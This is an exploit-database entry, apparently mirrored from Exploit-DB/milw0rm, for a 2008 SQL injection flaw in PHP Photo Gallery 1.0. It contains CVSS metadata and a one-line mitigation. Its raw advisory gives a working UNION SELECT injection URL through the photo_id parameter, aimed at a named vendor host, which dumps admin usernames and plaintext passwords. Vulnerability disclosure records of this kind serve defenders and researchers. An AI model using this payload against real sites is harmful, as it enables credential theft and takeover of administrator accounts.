PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys

vendor:

PHP Photo Gallery

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Photo Gallery

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:terong:php_photo_gallery:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys

PHP Photo Gallery is vulnerable due to insecure mysql querys. The below 'mysql injection' will display the admin username/password in plaintext.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		   PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 4 April 2008
SITE: http://www.terong.com/products/advanced-photo-gallery/
DORK: N/A


DESCRIPTION:
PHP Photo Gallery is vulnerable due to insecure mysql querys.
The below "mysql injection" will display the admin username/password in plaintext.


EXPLOITS:
http://gallery.terong.biz/index.php?photo_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password,0x3a,admin),4/**/FROM/**/users/**/WHERE/**/admin=0x59/*


NOTE/TIP:
passwords are in plaintext 


GREETZ: milw0rm.com, h4ck-y0u.org !



--==+================================================================================+==--
--==+		   PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-04]